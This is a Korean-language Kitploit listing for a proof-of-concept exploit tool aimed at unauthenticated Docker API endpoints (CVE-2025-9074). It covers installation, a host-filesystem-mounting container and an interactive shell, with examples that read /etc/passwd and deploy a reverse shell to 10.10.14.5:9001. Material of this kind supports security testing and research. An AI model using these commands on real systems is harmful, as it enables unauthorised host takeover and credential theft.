Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC (Proof-Of-Concept). 인증되지 않은 Docker API 엔드포인트를 대상으로 하는 통합 대화형 명령 셸을 갖춘 CVE-2025-9074용 정교한 익스플로잇 프레임워크. | Kitploit
도구/GitHubGitHub/xwpdx0/poc-2025-9074
Cloud Infrastructure SecurityPrivilege EscalationVulnerability ScannersContainer SecurityExploit FrameworksExploitationPost-ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubxwpdx0/poc-2025-9074
418개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

poc-2025-9074

Docker API CVE-2025-9074 PoC (Proof-Of-Concept). 인증되지 않은 Docker API 엔드포인트를 대상으로 하는 통합 대화형 명령 셸을 갖춘 CVE-2025-9074용 정교한 익스플로잇 프레임워크.

저장소 보기

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (Proof-Of-Concept)

인증되지 않은 Docker API 엔드포인트를 대상으로 하는 정교한 익스플로잇 프레임워크로, 통합된 대화형 명령 셸이 포함되어 있습니다.

Language Platform License

개요

이 도구는 인증 없이 노출된 Docker API 인스턴스를 자동으로 익스플로잇하여 대상 호스트에서 전체 컨테이너 생성 및 명령 실행을 가능하게 합니다. 사용자 정의 대화형 셸을 제공하여 사후 익스플로잇 작업을 원활하게 수행할 수 있습니다.

참고: 이는 사용자 정의 PoC 구현입니다. 저는 CVE-2025-9074를 발견하지 않았습니다.

데모

초기 익스플로잇

익스플로잇 과정

취약점 자동 탐지, 이미지 가져오기, 컨테이너 생성 및 초기화

대화형 명령 실행

명령 실행

명령 실행 기능을 갖춘 사후 익스플로잇 셸

주요 기능

  • Docker API 취약점 자동 스캔
  • 호스트 파일 시스템 마운트를 사용한 컨테이너 배포
  • 대화형 사후 익스플로잇 셸
  • 원격 명령 실행 인터페이스
  • 리버스 셸 배포 모듈
  • 가독성을 높인 컬러 터미널 출력

설치

  1. 저장소를 클론하세요
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. 코드를 컴파일하세요
root@kitploit:~
gcc poc.c -o poc-2025-9074

또는 Releases에서 바이너리를 다운로드할 수 있습니다.

사용법

root@kitploit:~
./poc-2025-9074

기본 대상

기본 대상(127.0.0.1:2375)에 대해 실행:

root@kitploit:~
./poc-2025-9074

사용자 지정 대상

사용자 지정 Docker API 엔드포인트를 지정:

사용자 지정 대상

대화형 셸

성공적인 익스플로잇 후, 대화형 셸에서 다음 명령을 사용할 수 있습니다:

명령어설명
cmd <command>컨테이너 내에서 임의 명령 실행
revshell <ip> <port>지정된 리스너에 리버스 셸 배포
info현재 컨테이너 및 대상 정보 표시

사용 예시

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

취약점 세부 정보

CVE-2025-9074는 적절한 인증 메커니즘이 없는 노출된 Docker API 엔드포인트를 가진 인스턴스에 영향을 미칩니다. 이 잘못된 구성은 Docker 데몬에 대한 무단 액세스를 허용하여 다음을 가능하게 합니다:

  • 임의 컨테이너 생성
  • 바인드 마운트를 통한 호스트 파일 시스템 액세스
  • 권한 상승 기회
  • 원격 코드 실행

법적 고지

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

  • 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템에서만 사용하십시오.
  • 컴퓨터 시스템에 대한 무단 액세스는 불법이며 법적 처벌을 받을 수 있습니다.
  • 작성자는 이 도구의 오용이나 피해에 대해 어떠한 책임도 지지 않습니다.
  • 사용자는 관련 법률 및 규정을 준수할 전적인 책임이 있습니다.

작성자

xwpd (@xwpdx0)

라이선스

MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하세요.


책임 있는 공개 및 보안 연구 목적으로만 사용하십시오.

도구 다운로드
exit대화형 세션 종료